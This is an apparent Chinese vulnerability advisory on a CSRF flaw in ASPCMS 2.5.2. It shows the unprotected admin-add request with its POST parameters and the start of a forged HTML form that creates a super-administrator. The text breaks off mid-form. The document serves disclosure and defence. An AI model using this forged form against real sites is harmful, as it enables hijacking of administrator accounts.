ASPCMS最新版CSRF添加管理员及GetShell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ~~ ### 详细说明: ASPCMS最新版2.5.2 CSRF添加管理员: 后台添加管理员的请求如下: 链接:http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add POST:GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1 可以看到没有防御CSRF 我们构造伪造表单: ``` <FORM name="form" action="http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" > <TD align=middle width=100 height=30>管理员组</TD> <select name="GroupID" id="GroupID"> <option value="1" >超级管理员组</option> <option value="6" >lpyuan</option> <option value="5" >普通管理员</option> </select> <TD align=middle width=100 height=30>管理员名称</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/> <TD align=middle width=100 height=30>管理员密码</TD> <INPUT type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/> <TD align=middle width=100 height=30>管理员描述</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息